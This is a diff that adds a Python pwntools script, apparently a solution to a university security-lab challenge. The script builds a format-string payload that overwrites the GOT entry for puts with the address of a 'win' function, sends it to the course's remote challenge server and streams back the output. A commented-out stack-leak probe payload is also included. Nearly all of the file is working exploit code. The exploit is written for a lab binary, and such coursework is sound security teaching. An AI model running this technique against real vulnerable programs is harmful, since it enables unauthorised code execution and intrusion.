Lab7

pa/lab7/chall_call_functions_again.py

@@ -0,0 +1,42 @@
+from pwn import remote, process, p32, ELF
+
+# Does not deal with \0s in any pointers needed
+def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
+	addrs: bytes = b""
+	writes: bytes = b""
+	cum_chars: int = 4 * len(data)
+
+	for offset in range(len(data)):
+		addr = base + offset
+		addrs += p32(addr)
+		arg_n = arg_base + offset
+		n = data[offset] - (cum_chars % 256)
+		if n < 8: n += 256
+		print(f"addr={hex(addr)} byte={hex(data[offset])} cum_chars={cum_chars}({hex(cum_chars%256)}) n={n}")
+		write = f"%{n}x%{arg_n}$hhn"
+		print(write)
+		writes += write.encode('utf-8')
+		cum_chars += n
+
+	pl = addrs + writes
+	if b"\0" in pl: raise Exception("Payload requires a \\0")
+	return pl
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25197
+
+conn = remote(HOST, PORT)
+#conn = process("07_call_functions")
+#input()
+
+elf = ELF("07_call_functions")
+got_puts = elf.got['puts']
+win = elf.sym['win']
+pl = print_to_ram(got_puts, 7, p32(win)) + b"\n"
+print(f"Payload: ({len(pl)})", pl, "\n\n")
+
+#pl = b"AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
+
+conn.send(pl)
+while conn.connected():
+	print(chr(conn.recv(1)[0]), end="", flush=True)